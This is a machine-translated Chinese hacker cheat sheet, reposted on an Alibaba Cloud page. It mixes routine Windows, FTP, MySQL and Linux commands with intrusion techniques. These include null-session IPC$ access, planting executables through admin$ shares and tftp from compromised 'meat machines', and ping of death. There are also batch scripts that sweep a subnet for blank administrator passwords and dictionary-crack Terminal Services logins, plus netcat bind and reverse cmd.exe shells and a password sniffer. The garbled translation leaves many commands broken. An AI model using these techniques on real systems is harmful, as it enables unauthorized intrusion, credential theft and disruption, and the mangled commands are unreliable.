NET USER Command Collection

Source: Internet
Author: User
Tags echo info exit in ftp commands ftp connection net time terminates administrator password net send

NET USER Command Collection

NET use \\ip\ipc$ ""/user: "" to establish an IPC NULL link
NET use \\ip\ipc$ "password"/user: "username" establishes IPC non-null link
NET use h: \\ip\c$ "password"/user: "User name" mapping the other side after direct login C: to the local H:

NET use H: \\ip\c$ maps after login C: to Local H:
NET use \\ip\ipc$/del remove IPC links
NET use H:/del to delete mappings that map each other to local H:
NET user username password/add set up users
NET user Guest/active:yes activates the guest user
NET user to see which users are

NET user account name to view the properties of the account
net localgroup Administrators user name/add Add "user" to the administrator to have administrator privileges, note: After the administrator plus s with plural
net start to see which services are open
Net start service name (e.g.: net start Telnet, net start schedule)
NET stop service name stops a service
NET time \ \ Destination IP to view the offset
NET time \ \ target Ip/set to set the local computer time to synchronize with the "Destination IP" host, plus the parameter/yes to cancel the confirmation message
NET view to see which shares are open within the local area network
NET view \\ip see which shares are turned on in the other LAN

NET config display system network settings
NET logoff disconnected sharing
NET Pause Service name pauses a service
NET send IP "text message" to the other party to send messages
NET ver LAN network connection types and information that are in use
NET share viewing locally-enabled shares
NET share ipc$ turn on ipc$ sharing
NET share ipc$/del Delete ipc$ share
NET share C $/del removal of C. shared

NET user Guest 12345 log in with guest user and change password to 12345
NET password Password change system login password
Netstat-a See which ports are open, common Netstat-an
Netstat-n View Port network connectivity, common Netstat-an
Netstat-v viewing work in progress
Netstat-p protocol Example: Netstat-p TCQ/IP Viewing a protocol usage (viewing TCP/IP protocol usage)
Netstat-s View all protocol usage in use
Nbtstat-a IP 136 to 139 if one of the ports is open, you can view the user name of the other person who recently logged in (03)-Note: parameter-A to capitalize
Tracert-parameter IP (or computer name) trace route (packet), Parameter: "-W number" is used to set the time-out interval.

Ping IP (or domain name) sends the default size of 32 bytes of data to the host, parameter: "-l[space" packet size ";"-N Send data Number ";"-T "means to ping all the time.
PING-T-l 65550 ip death ping (send files larger than 64K and Ping is the ping of death)
Ipconfig (winipcfg) for Windows NT and XP (Windows 95 98) View local IP address
Ipconfig available parameters "/all" To display all configuration information
TLIST-T Displays the process as a tree list (additional tools for the system, which are not installed by default, within the Support/tools folder of the installation directory)
KILL-F process name plus-F parameter force end a process (additional tools for the system, default is not installed, in the Support/tools folder of the installation directory)
Del-f file name plus-F parameter can delete read-only files,/ar,/ah,/as,/AA respectively for deletion, read-only, hidden, system, archive files,/a-r,/a-h,/a-s,/a-a means to delete files except read-only, hidden, system, archive. For example, "del/ar * *" means deleting all read-only files in the current directory, "Del/a-s * *" means deleting all files except system files in the current directory

DEL/S/q directory or use: rmdir/s/q directory/S to delete all subdirectories and files under directories and directories. Use the parameter/q at the same time to cancel the system confirmation when the delete operation is deleted directly. (two commands function the same)
Move drive letter \ path \ file name to be moved the path of the moved file \ Move the file name after moving, with the parameter/y will cancel to confirm that the mobile directory exists the same file prompt to overwrite directly

FC One.txt two.txt > 3st.txt compare two files and output the differences to the 3st.txt file, ">" and "> >" are redirect commands
At ID number to open a scheduled task that has already been registered
At/delete Stop all scheduled tasks, use parameter/yes to stop directly without confirmation
At ID number/delete stop a registered scheduled task
At View all scheduled tasks
At \\IP time program name (or a command)/R run the other program and restart the computer at some point

Finger username @host See which users have logged in recently
Telnet IP port far and landing server, default port is 23
Open IP connection to IP (after telnet login command)
Telnet directly on this computer telnet will enter the native Telnet
Copy path \ file name 1 path \ filename 2/y copy file 1 to the specified directory is file 2, with the parameter/y to cancel the confirmation you want to overwrite an existing directory file
Copy C:\srv.exe \\ip\admin$ Copying the local c:\srv.exe to the other side of the admin
Cppy 1st.jpg/b+2st.txt/a 3st.jpg will 2st.txt content hide to 1st.jpg to generate 3st.jpg new file, Note: 2st.txt file header to empty three rows, parameters:/b refers to binary files,/a refers to the ASCLL format file

Copy \\ip\admin$\svv.exe c \ Or: copy\\ip\admin$\*.* Copy the Srv.exe file (all files) under the admini$ share to local C:
xcopy to copy files or directory tree destination address \ directory name copy file and directory tree, with parameter/y will not prompt overwrite same file
Tftp-i own IP (using meat machine as a springboard for this with meat machine IP) get Server.exe c:\server.exe

After logging in, the "IP" Server.exe download to the target host C:\server.exe parameter:-I refers to the binary mode, such as the transfer of EXE files, such as not add-I in ASCII mode (transfer text file mode) for transmission
Tftp-i the other IP put C:\server.exe login, upload the local c:\server.exe to the host
The FTP IP port is used for uploading files to the server or for file operations, and the default port is 21. Bin refers to binary mode (executable file); The default is ASCII format (when text files are sent)
Route print shows IP routing, which will primarily display network address addres, subnet mask

Netmask, gateway address gateways Addres, interface address interface
ARP view and process ARP cache, ARP is the meaning of name resolution, is responsible for the resolution of an IP to a physical MAC address. ARP-A will show all the information
Start Program name or command/max or/min opens a new window and maximizes (minimizes) the running of a program or command
Mem View CPU Usage
attrib file name (directory name) to view the properties of a document (directory)
attrib file name-a-r-s-h or +a +r +s +h Remove (add) a file of the archive, read-only, system, hidden properties; + is added as a property
Dir view file, Parameters:/q Display file and directory belongs to the system which user,/T:C display file creation time,/t:a show the last time the file was accessed,/t:w last modified time
date/t, time/t using this parameter, "date/t", "time/t" will display only the current date and time without having to enter a new date and time
SET specifies the environment variable name = The character to assign to the variable set environment variable
Set shows all the current environment variables
Set P (or other character) displays all environment variables currently starting with the character P (or other characters)
Pause pauses the batch process and displays: Press any key to continue ....
If conditional processing is performed in a batch program (see the IF command and variable for more instructions)
Goto label directs cmd.exe to labeled rows in a batch program (labels must be on a separate line with a colon, for example: ": Start" tab)
Call path \ batch file name calls another batch program from the batch program (for more instructions, see Calling/?)

For each file in a set of files, execute a specific command (see the for command and variable for more instructions)
echo on or off turns echo on or off, and the current ECHO setting is displayed only with echo without parameters
Echo information Displays information on the screen
echo Info >> pass.txt Saving "info" to a pass.txt file
findstr "Hello" aa.txt looking for string Hello in Aa.txt file
Find filename finds a file

Title Title name change cmd window title name
A color color value sets the cmd console foreground and background color; 0 = black, 1 = blue, 2 = green, 3 = Light green, 4 = red, 5= violet, 6 = yellow, 7 = white, 8 = Gray, 9 = blue, a= green, b= light aqua, c= red, d= light purple, e= yellow, f= bright white
Prompt name change cmd.exe display command prompt (change C: \, d:\ to entsky\)
Print file name prints text files

VER displays version information under a DOS window
Winver Pop-up window displays version information (memory size, system version, patch version, computer name)
Format drive letter/fs: Type formatted disk, type: FAT, FAT32, NTFS, Example: Format D:

MD Directory Name creation directory
Replace the file's directory replacement file to replace the source file
ren original filename new file name rename filename
Tree displays a table of contents, with parameter-F to list the file names in the first folder
Type file name Displays the contents of the text file
More file name display output file by screen

Doskey the command to lock = character
Doskey to unlock command = Lock command provided for DOS (Edit command line, Recall Win2K command, and create macro). such as: Lock dir command: Doskey Dir=entsky (cannot use Doskey dir=dir);

Unlock: Doskey dir=
Taskmgr Bring up Task Manager
chkdsk/f d: Check disk D and Display status report, add parameter/F and Repair errors on disk
tlntadmn telnt service admn, type tlntadmn select 3, and then select 8 to change the Telnet service

Default port 23 is any other port
Exit Cmd.exe program or currently, use the parameter/b to exit the current batch script instead of Cmd.exe
Path path \ The file name of the executable file is set to an executable file.
CMD launches a Win2K command Interpretation window. Parameters:/eff,/en off, open command extension;

See cmd for detailed instructions.
REGEDIT/S registry File name Import registry, parameters/s refers to quiet mode import, without any hint;
regedit/e registry File name Export Registry
The cacls filename parameter displays or modifies the File access control List (ACL)-when it is formatted for NTFS. Parameter:/d Username: Set Deny user access,/p user name ERM replaces the specified user's access rights;/g user name ERM gives access to the specified user; Perm can be: N None, R read,

W Write, C Change (write), F Full Control; Example: cacls d:\test.txt/d Pub setting

D:\test.txt denies pub user access.
cacls file name to view a list of Access user rights for files
REM text content add annotations to a batch file
Netsh view or change the configuration of the local network

IIS Service commands:
Iisreset/reboot Restart the Win2K computer (but prompted the system will restart the message appears)
Iisreset/start or stop to start (stop) all Internet services
Iisreset/restart stop and then restart all Internet services
Iisreset/status Show all Internet service status
Iisreset/enable or disable enable (disable) Restart of Internet services on the local system
Iisreset/rebootonerror If an error occurs when you start, stop, or restart the Internet service

The error will restart the boot
Iisreset/noforce If you cannot stop Internet services, you will not be forced to terminate Internet services
Iisreset/timeout Val still does not stop Internet services when it arrives over time (seconds), if specified

/rebootonerror parameter, the computer will reboot. The default value is 20 seconds to restart, 60 seconds to stop, and 0 seconds to reboot.

FTP command: (Details are explained later)
The command line format for FTP is:
Ftp-v-d-i-n-g[Host name]-V displays all the response information for the remote server.
-D uses debug mode.
-N Restricts automatic logon of FTP, that is, the. netrc file is not used.
-G cancels the global file name.
Help [command] or? [command] View command description
Bye or quit terminates the host FTP process and exits the FTP management mode.
PWD lists the current remote host directory
Put or send local file name [upload file name on host] to transfer local files to remote

In the host
Get or recv [remote host file name] [filename downloaded to local] is transferred from the remote host to

On the local host
Mget [Remote-files] receives a batch of files from the remote host to the local host
Mput Local-files transfers A batch of files from the local host to the remote host
dir or LS [remote-directory] [local-file] lists the files in the current remote host directory.

If there is a local file, write the result to a local file
ASCII settings transfer files in ASCII mode (default value)
Bin or image settings to transfer files in binary mode
Bell every time a file transfer, Alarm prompts
Cdup return to the top level directory
Close interrupts the FTP session with the remote server (corresponding to open)
Open Host[port] Establish a specified FTP server connection to specify the connection port
Delete deletes files from the remote host
Mdelete [remote-files] Deleting a batch of files
mkdir directory-name Creating directories in the remote host
Rename [from] [to] changes the file name in the remote host
RmDir directory-name Delete Directories in the remote host

Status displays the state of the current FTP
System displays the remote host systems type
User user-name [Password] [account] re-login to the remote host with another user name
Open host [port] re-establishes a new connection
Prompt interactive Prompt mode
MACDEF Defining macro Commands
The LCD changes the working directory of the current local host and, if default, goes to the home directory of the current user

chmod changing the file permissions of the remote host
Case when on, use the mget command to copy the file name to the local machine, all converted to lowercase letters
CD Remote-dir into the remote host directory
Cdup Enter the parent directory of the remote host directory! Perform an interactive shell,exit in the local machine back to the FTP environment, such as!ls*.zip

MYSQL command:
Mysql-h host Address-u user name-p password connection mysql; If you just installed MySQL, super users

Root does not have a password.
(Example: mysql-h110.110.110.110-uroot-p123456
Note: You and root can use no spaces, others are the same)
Exit MySQL
Mysqladmin-u username-p Old password password new password change password
Grant SELECT on database. * To User name @ login host identified by \ "Password \"; Add new users. (Note: Unlike the above, the following is because it is a command in a MySQL environment, so it is followed by a semicolon as a command terminator)

show databases; Displays the list of databases. Just started with two databases: MySQL and test.

MySQL Library is very important it has the MySQL system information, we change the password and the new user, is actually using this library to operate.
Use MySQL;
Show tables; Displaying data tables in a library
describe table name; Show the structure of a data table
Create database name; Build Library
Use library name;

CREATE TABLE table name (field settings list);
drop database name;
drop table name, delete library and delete table
Delete from table name; Empty records in a table
SELECT * from table name; Show records in a table
mysqldump--opt school>school.bbb Backup database: (Command executed under DOS \\mysql\\bin directory); NOTE: Back up the database school to the school.bbb file, school.bbb is a text file, the filename is taken, open to see what you will find.

New commands under Win2003 System (Practical section):
Shutdown/Parameters Close or restart the local or remote host.
Parameter description:/S Shut down the host,/R restart the host,/T digital Set the time delay, range 0~180

Seconds,/A cancels the boot,/M//IP the specified remote host.
Example: SHUTDOWN/R/T 0 restart the local host immediately (no delay)
Taskill/Parameter The process name or PID of the process terminates one or more tasks and processes.
Parameter description:/pid to terminate the PID of the process, the tasklist command can be used to obtain the process name of the process pid,/im to be terminated by the process,/F to terminate the process,/T to terminate the specified process and the child process he initiated.

TASKLIST Displays the process identifier (PID) of processes, services, and services that are currently running on local and remote hosts.
Parameter description:/M lists the DLL files that are loaded by the current process,/SVC displays the services for each process, and lists only the current processes without parameters.

Linux system basic commands: to distinguish case
Uname display version information (same as Win2K ver)
DIR Displays the current directory file, Ls-al display includes hidden files (dir with Win2K)
PWD Query the directory location where you are currently located
CD CD. Go back to the previous level and note the CD with the. There are spaces between them. CD/Return to the root directory.
Cat file name view file contents
Cat >abc.txt The contents of the Abc.txt file.
More file names display a text file in a page-by-page fashion.

CP Copy File
MV Moving files
RM file name Delete file, rm-a directory name delete directory and subdirectories
mkdir Directory name creation directory
RmDir Delete subdirectories, there are no documents in the directory.
chmod setting access rights to files or directories

Grep finds a string in the archive
Diff file Comparison
Find Archive Search
Date, time of day
Who queries the person who is currently using the same machine as you and the login time location
W Query the details of the current person on the machine
WhoAmI to see your account name
Groups to see someone's group
passwd Change Password
History View the commands you've been under
PS Display process Status

Kill stops a process
GCC hackers usually use it to compile files written in C language.
The SU permission is converted to the specified consumer
Telnet IP Telnet connects to the other host (same as Win2K), indicating that the connection was successful when bash$ was present.
FTP FTP connection on a server (same as Win2K)

Attached: Batch commands and variables

1:for command and variable basic format:
For/Parameter%variable in (set) do command [Command_parameters]%variable:

Specifies a single-letter replaceable parameter, such as:%i, while specifying a variable is used:%%i, while the variable is called with:%i%, the variable is case-sensitive (%i is not equal to%i). A total of 10 variables can be processed per batch from%0-%9, where%0 is used by default for batch file names,%1

The default is the first value entered when using this batch, the same as:%2-%9 refers to the input 第2-9个 value;

Example: NET use \\ip\ipc$ pass/user:user with IP%1,pass%2 and user%3

(set): Specify a file or set of files that can use wildcards such as: (D:\user.txt) and (1 1 254) (1-1 254), {"(1 1 254)" The first "1" refers to the starting value, the second "1" refers to the increment, and the third "254" refers to the ending value, i.e. from 1 to 254; (1-1 254) "Description: From 254 to 1}

Command: Specify commands for the first file, such as the net USE command, and command this:& to separate commands when executing multiple commands
Command_parameters: Specifying parameters or command-line switches for specific commands

In (set): Refers to the value in the (set); Do command: means the command

Parameter:/L refers to increment form {(set) as increment when};/f refers to the constant fetching of values from a file until {(set) is a file, such as when (D:\pass.txt)}.

Examples of usage:
@echo off
echo usage format: Test.bat *.*.* > Test.txt

FOR/L%%g in (1 1 254) does echo%1.%%g >>test.txt & net use \\%1.%%g

/user:administrator | Find "command completed successfully" >>test.txt
Save As Test.bat Description: For the specified class C segment of the 254 IP to try to establish administrator

The password is empty for the ipc$ connection, and if successful, the IP is present in the Test.txt.

/L refers to the increment form (that is, from 1-254 or 254-1); The IP front three bits entered: *.*.* is the default for batch processing

The%1;%%g is a variable (the last of the IP);& used to separate the two commands for Echo and net use;

| refers to the establishment of ipc$, in the results with find to see if there is a "command completed successfully" information;%1.%%g is the full IP address; (1 1 254) refers to the starting value, the increment, the value of the knot.
@echo off
echo Usage format: Ok.bat IP
for/f%%i in (D:\user.dic) do smb.exe%1%%i D:\pass.dic 200 Save As: Ok.exe Description: After entering an IP, use the dictionary file d:\pass.dic to violently solve the user password in d:\user.dic until The value in the file is exhausted. %%i is the user name;%1 is the IP address entered (default).

2:if command and variable basic format:
If [NOT] errorlevel numeric command statement if the program runs and then returns an exit code equal to or greater than the specified number, the specified condition is true.
The IF errorlevel 0 command refers to a command that returns a value of 0 o'clock after a program executes, after the value line;
If the ERRORLEVEL 1 command means that the last value returned by the program execution is not equal to 1, the following command is executed.
0 means found and executed successfully (true); 1 means no discovery, no execution (false).
If [not] string 1== string 2 command statement if the specified text string matches (that is, string 1 equals string 2), the following command is executed.
Example: "If"%2% "= =" 4 "goto start" means: If the second variable entered is 4 o'clock, execute the following command (note:% variable name% plus "" when calling a variable)
If [not] exist file name Command statement executes the following command if the specified file name exists.
Example: "If not nc.exe goto end" means: If the Nc.exe file is not found, jump to the ": End" tab.

If [NOT] errorlevel numeric command statement Else command statement or if [not] string 1== String 2 command Statement else command statement or if [not] exist file name Command statement Else command statement after add: Else command statement Refers to: When the condition of the current polygon is not true, it refers to the command following the line else. Note: Else must be valid on the same line as if. When there is a del command, you need to enclose all of the Del command in < >, because the del command executes on a separate line, with < > It is a single line, for example: "If exist test.txt. else Echo

Test.txt.missing ", note the". "In the command

(ii) System external commands (all need to download the relevant tools):

1. Swiss Army Knife: Nc.exe

Parameter Description:
-H View Help information
-D background mode
-E prog program redirection, one but the connection execution [danger]
-i secs delay interval
-l listening mode, for inbound connection
-L listening mode, the connection is still continued after the closed Listen until Ctr+c
-n IP address, cannot use domain name
-o film record 16 binary transport
-p[space] Port local port number
-R random local and remote port
-T using telnet interactive
-u udp mode
-v verbose output, with-VV more detailed
-W digital timeout delay interval
-Z to input, output off (for sweep anchor)
Basic usage:
NC-NVV 80 connection to host 80 port nc-l-p 80 turn on native TCP 80 port and listen for
Nc-nvv-w2-z 80-1024 sweep anchor 80-1024 Port
Nc-l-P 5354-t-e C:wi Nntsystem32cmd.exe binding remote host Cmdshell on remote TCP 5354 port
Nc-t-E c:winntsystem32cmd.exe 5354 Cmdshell the remote host and reverse-connect the 5354 port

Advanced usage:
Nc-l-P 80 as a honeypot 1: Open and keep listening to 80 ports until Ctr+c
Nc-l-p > C:\log.txt as Honeypot 2: Open and constantly listen to 80 ports until ctr+c, and output the results to C:\log.txt
Nc-l-P < c:\honeyport.txt as a honeypot with 3-1: Open and constantly listen to 80 ports, until Ctr+c, and c:\honeyport.txt content into the pipeline, can also play the role of transmitting files Type.exe \ C Honeyport | Nc-l-P 80 as a honeypot with 3-2: Open and constantly listen to 80 ports, until Ctr+c, and put the contents of C:\honeyport.txt into the pipeline, can also play the role of transmitting files

On-Machine use: nc-l-P native Port
On the other side of the host with: nc-e Cmd.exe native ip-p native port *win2knc-e/bin/sh native ip-p native port *linux,unix Reverse connection breach the other side of the host's firewall, this machine is used: nc-d-l-p native Port < The path and name of the file to be transferred is used on the host computer: NC-VV native IP port > The path and name of the file to transfer the file to the other host

| Pipeline command
< or > redirect command. "<", for example: tlntadmn < test.txt refers to the contents of Test.txt

Assigning a value to the tlntadmn command @ means executing the command at the end of the @, but it will not be displayed (background execution); Example: @dir C:\Winnt

>> d:\log.txt means: dir is executed in the background and the result exists in D:\log.txt
The difference between > and >> ">" means: Overwrite; ">>" means: Save to (add to).
such as: @dir C:\Winnt >> d:\log.txt and @dir c:\winnt > d:\log.txt two commands respectively

Perform two comparisons look: The >> is to save two times the results, and with:> only one result, because the second result of the first cover.

2, Sweep anchor tool: Xscan.exe

Basic format
Xscan-host < start ip>[-< stop Ip>] < detect items > [Other options] Sweep anchor "Start IP to terminate

IP "segment for all host information
Xscan-file < host list file name > < detect item > [Other options] sweep anchor All host information in host IP list file name

Test items
-active detects if the host is alive
-os detecting Remote Operating system types (via NetBIOS and SNMP protocol)
-port Detecting port status for common services
-FTP Detecting FTP Weak password
-pub Detect FTP Service anonymous user write permission
-POP3 Detecting pop3-server Weak password
-SMTP Detecting Smtp-server Vulnerabilities
-sql Detecting sql-server Weak password
-SMB Detecting nt-server Weak password
-iis Detecting IIS Encoding/decoding vulnerabilities
-CGI Detecting CGI Vulnerabilities
-NASL Load Nessus Attack script
-all detect all of the above items

Other options
-I adapter number set the network adapter, < adapter number > can be obtained by the "-L" parameter
-L Show All network adapters
-V Show detailed scan progress
-P skips hosts that are not responding
-O Skip hosts that do not detect open ports
-T concurrent threads, number of concurrent hosts specifies the maximum number of concurrent threads and number of concurrent hosts, the default number is 100,10
-log file name Specifies the scan report file name (suffix: TXT or HTML-formatted file)

Usage examples
Xscan-host Detection all the vulnerabilities of hosts within a network segment, skipping unresponsive hosts
Xscan-host 150-o Detection

Standard port status of host in network segment, NT weak password user, max

The number of concurrent threads is 150, skipping hosts that do not detect open ports
Xscan-file hostlist.txt-port-cgi-t 200,5-v-o detection "hostlist.txt"

The standard port State of all hosts listed in the file, CGI vulnerabilities, maximum concurrent threads number 200, detection of up to 5 hosts at the same time, display detailed detection progress, skipping hosts without detection of open ports

3. Command line sniffer: Xsniff.exe
Can capture ftp/smtp/pop3/http protocol password in LAN
Parameter description
-TCP Output TCP Datagram
-UDP output UDP Datagram
-ICMP output ICMP datagram
-pass Filter Password information
-hide Background Run
-host Resolving host Names
-ADDR IP address Filter IP address
-port Port Filter Port
-log file name output saved to file
-ASC output in ASCII format
-hex output in 16 binary form

Usage examples
Xsniff.exe-pass-hide-log pass.log background run sniff password and save password information in Pass.log file
Xsniff.exe-tcp-udp-asc-addr sniffing and filtering TCP and UDP information and outputting in ASCII format

4, Terminal Services password cracking: Tscrack.exe

Parameter description
-H Display Use Help
-V Display version information
-S on-screen decryption capability
-B sound when password is wrong
-T with multiple connections (multi-threaded)
-N Prevent System Log entries on targeted server
-u uninstall remove Tscrack component
-F Use the password after-F
-F Interval Time (frequency)
-l Use user name after-l
-W Use the password dictionary after-W
-P Use the password after-p
-D sign-in main page
Usage examples
Tscrack administrator-w pass.dic remote with password dictionary file burst

Administrator login password of the host
Tscrack administrator-p 123456 remote login with password 123456 's administrator users
@if not exist Ipcscan.txt Goto Noscan
@for/F "Tokens=1 delims="%%i in (3389.txt) does call Hack.bat%%i
@echo 3389.txt no find or scan faild
(① saved as 3389.bat) (assuming that an existing superscan or other sweep anchor is swept to a batch of 3389 main

Machine IP list file 3389.txt)
3389.bat means: Take an IP from the 3389.txt file, then run Hack.bat
@if not exist Tscrack.exe Goto Noscan
@tscrack%1-l administrator-w pass.dic >>rouji.txt
: Noscan
@echo Tscrack.exe no find or scan faild
(② saved as Hack.bat) (run 3389.bat is OK, and 3389.bat, Hack.bat, 3389.txt,

Pass.dic and Tscrack.exe in the same directory; You can wait for the result.)
Hack.bat means: Run Tscrack.exe with a dictionary burst all the hosts in 3389.txt

Administrator password and save the cracked result in the Rouji.txt file.

5. Other:

Shutdown \\IP address t:20 20 seconds after the other NT automatically shut down (Windows 2003 system comes with tools, in the Windows2000 under the need to download this tool to use. This is described in more detail in the previous Windows 2003 DOS command. )

The Fpipe.exe (TCP port Redirection tool) is described in detail in the second article (port redirection bypasses the firewall)

Fpipe-l 80-s 1029-r When someone anchors your 80 port, the result he sweeps is completely host information
Fpipe-l 23-s 88-r 23 Destination IP sends the 23-port Telnet request sent to the destination IP via port redirection to the 23 port of the destination IP over Port 88. (The 88 port that the machine uses to connect to the target IP when telnet is established) then: direct telnet (native IP) is connected to port 23 of the destination IP.

OpenTelnet.exe (remotely turn on the Telnet tool)
Opentelnet.exe \\IP account Password NTLM authentication method telnet port (do not need to upload Ntlm.exe corrupt Microsoft authentication method) directly remotely open the other side of the Telnet service, you can use Telnet \\ip connect to each other.

NTLM authentication method: 0: Do not use NTLM authentication, 1: First try NTLM authentication, if it fails, then use the user name and password; 2: Use only NTLM authentication.

ResumeTelnet.exe (another tool included with Opentelnet)
Resumetelnet.exe \\IP account password after connecting with Telnet, use this command to

The other side's Telnet settings are restored, and the Telnet service is turned off.

6, FTP command detailed:

FTP commands are one of the most frequently used commands for Internet users, and they are familiar with and have the flexibility to apply FTP internal commands

, can greatly facilitate users, and receive a multiplier effect. If you want to learn to use background FTP under

You must learn the FTP instructions.

The command line format for FTP is:
Ftp-v-d-i-n-g [host name], where

-V Displays all the response information for the remote server;

-N Limit FTP automatic login, that is, do not use;. n etrc file;

-d use debug mode;

-G cancels the global file name

NET USER Command Collection

Related Article

E-Commerce Solutions

Leverage the same tools powering the Alibaba Ecosystem

Learn more >

Apsara Conference 2019

The Rise of Data Intelligence, September 25th - 27th, Hangzhou, China

Learn more >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.